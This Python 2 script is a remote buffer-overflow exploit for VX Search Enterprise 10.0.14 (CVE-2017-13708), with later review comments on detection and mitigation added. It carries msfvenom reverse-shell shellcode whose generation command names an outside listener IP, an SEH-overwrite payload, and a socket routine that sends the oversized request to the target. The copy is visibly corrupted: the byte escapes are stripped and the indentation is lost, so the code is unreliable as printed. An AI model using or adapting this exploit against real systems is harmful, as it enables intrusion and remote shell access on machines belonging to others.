#!/usr/bin/env python
# Exploit Title : VX Search Enterprise v10.0.14 Remote Buffer Overflow [CVE-2017-13708]
# Discovery by : Anurag Srivastava and Nipun Jaswal
# Credits : Team Pyramid
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 26/08/2017
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.0.14.exe
# Tested Version : 10.0.14
# Tested on OS : Windows 7 Ultimate x64bit
# Category : Windows Remote Exploit
# CVE : CVE-2017-13708
# Steps to Reproduce: In VX Search go to Options -> Server -> check the box "Enable Web Server" on port 8082. Run the Python script to get a reverse shell.

import socket,sys

# --- Configuration -------------------------------------------------------
# Target host and the VX Search built-in web server port (8082, the port the
# reproduction steps above enable).  The script is Python 2 code: it uses
# print statements and str payloads, so it does not run unchanged under
# Python 3.
target = "127.0.0.1"
port = 8082


#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
# Shellcode block; the comment above records how the author generated it.
# NOTE(review): in this copy the backslashes of the "\xNN" escapes are
# missing, so each `+=` below appends literal ASCII text, not the intended
# bytes.
buf = ""
buf += "x89xe3xdaxdexd9x73xf4x5bx53x59x49x49x49"
buf += "x49x49x49x49x49x49x49x43x43x43x43x43x43"
buf += "x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"
buf += "x41x51x32x41x42x32x42x42x30x42x42x41x42"
buf += "x58x50x38x41x42x75x4ax49x4bx4cx4dx38x6d"
buf += "x52x35x50x37x70x65x50x71x70x6bx39x4dx35"
buf += "x70x31x4bx70x63x54x6cx4bx56x30x76x50x4c"
buf += "x4bx63x62x76x6cx4cx4bx50x52x76x74x4cx4b"
buf += "x42x52x36x48x34x4fx58x37x51x5ax37x56x46"
buf += "x51x79x6fx6ex4cx55x6cx31x71x51x6cx67x72"
buf += "x34x6cx51x30x59x51x48x4fx36x6dx65x51x79"
buf += "x57x59x72x6bx42x72x72x72x77x4cx4bx52x72"
buf += "x76x70x6cx4bx61x5ax77x4cx6ex6bx42x6cx66"
buf += "x71x50x78x6ax43x32x68x75x51x6bx61x36x31"
buf += "x4ex6bx70x59x47x50x75x51x7ax73x4cx4bx30"
buf += "x49x66x78x79x73x64x7ax73x79x6cx4bx45x64"
buf += "x4cx4bx36x61x7ax76x50x31x6bx4fx4ex4cx4f"
buf += "x31x7ax6fx36x6dx43x31x39x57x74x78x6bx50"
buf += "x31x65x6bx46x43x33x53x4dx68x78x77x4bx33"
buf += "x4dx31x34x44x35x78x64x56x38x6ex6bx36x38"
buf += "x75x74x56x61x78x53x65x36x4ex6bx66x6cx30"
buf += "x4bx6ex6bx33x68x65x4cx63x31x68x53x6cx4b"
buf += "x65x54x4ex6bx33x31x58x50x6ex69x43x74x31"
buf += "x34x65x74x53x6bx71x4bx71x71x46x39x72x7a"
buf += "x53x61x39x6fx49x70x43x6fx61x4fx61x4ax4e"
buf += "x6bx44x52x78x6bx6ex6dx33x6dx33x58x75x63"
buf += "x50x32x35x50x37x70x32x48x54x37x70x73x34"
buf += "x72x63x6fx66x34x62x48x52x6cx52x57x44x66"
buf += "x43x37x39x6fx79x45x4cx78x4ex70x43x31x45"
buf += "x50x57x70x34x69x6fx34x51x44x70x50x53x58"
buf += "x76x49x6fx70x50x6bx33x30x79x6fx5ax75x50"
buf += "x50x46x30x42x70x46x30x51x50x62x70x67x30"
buf += "x70x50x30x68x79x7ax56x6fx69x4fx49x70x69"
buf += "x6fx48x55x6fx67x52x4ax36x65x75x38x68x39"
buf += "x33x6cx6bx6fx74x38x52x48x43x32x57x70x44"
buf += "x51x71x4bx4cx49x4bx56x31x7ax72x30x56x36"
buf += "x50x57x63x58x6dx49x6dx75x34x34x63x51x79"
buf += "x6fx4bx65x6cx45x6bx70x43x44x36x6cx69x6f"
buf += "x72x6ex76x68x52x55x48x6cx52x48x78x70x6c"
buf += "x75x6fx52x52x76x4bx4fx4ex35x42x48x43x53"
buf += "x50x6dx35x34x63x30x6ex69x4dx33x62x77x43"
buf += "x67x56x37x75x61x39x66x42x4ax62x32x31x49"
buf += "x70x56x69x72x39x6dx72x46x59x57x51x54x45"
buf += "x74x77x4cx33x31x46x61x4ex6dx37x34x57x54"
buf += "x56x70x68x46x47x70x62x64x36x34x46x30x61"
buf += "x46x36x36x62x76x70x46x72x76x32x6ex61x46"
buf += "x30x56x56x33x70x56x73x58x53x49x48x4cx55"
buf += "x6fx4fx76x49x6fx4ax75x4fx79x39x70x52x6e"
buf += "x72x76x37x36x4bx4fx56x50x61x78x65x58x4e"
buf += "x67x57x6dx75x30x39x6fx59x45x6fx4bx78x70"
buf += "x4dx65x4ex42x71x46x71x78x6ex46x6cx55x4f"
buf += "x4dx6fx6dx79x6fx59x45x35x6cx53x36x53x4c"
buf += "x54x4ax4dx50x6bx4bx4bx50x54x35x65x55x6d"
buf += "x6bx63x77x55x43x43x42x32x4fx63x5ax43x30"
buf += "x72x73x4bx4fx48x55x41x41"

# Pad the shellcode out to 2492 bytes -- the offset at which, according to
# the author, the SEH record is overwritten.  That offset cannot be checked
# from this page; it is specific to the tested build (10.0.14).  If `buf`
# were ever longer than 2492 bytes the padding expression yields an empty
# string and the layout below would no longer line up.
payload = buf
payload += 'A' * (2492 - len(payload))

# SEH-overwrite layout: next-SEH pointer, then a handler address the author
# attributes to libpal.dll.  Mitigation note: a fixed handler address like
# this presumably depends on that module being loaded without SafeSEH/ASLR;
# the practical remediation is to move past the affected version and to keep
# the built-in web server disabled unless it is needed.
payload += 'xEBx10x90x90' # NSEH: First Short JMP
payload += 'x48xAEx13x10' # SEH : libpal.dll new 1013AE48
payload += 'x90' * 10
payload += 'xE9x25xBFxFFxFF' # Second JMP to ShellCode


# Pad to a fixed total request-path length of 5000 bytes.
payload += 'D' * (5000-len(payload))
# Connect to the target.  NOTE(review): the bodies of `try`/`except` lost
# their indentation in this copy; the bare `except:` also catches
# KeyboardInterrupt/SystemExit, not just socket errors.
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((target,port))
print "[*] Connection Success."
except:
print "Connction Refused %s:%s" %(target,port)
sys.exit(2)


# The request line carries the whole 5000-byte payload as the URI, prefixed
# with "/../".  Detection note: a request-URI several kilobytes long sent to
# the VX Search web port is the observable here -- legitimate paths are far
# shorter -- so a request-line length limit at a proxy/WAF in front of the
# service, plus the vendor update, is the practical defence.
packet = "GET /../%s HTTP/1.1 " %payload
packet += "Referer: http://pyramidcyber.com.com "
packet += " "

print "[*] ENJOY ! ;) "
# send() returns the number of bytes actually written; the result is ignored.
s.send(packet)
s.close()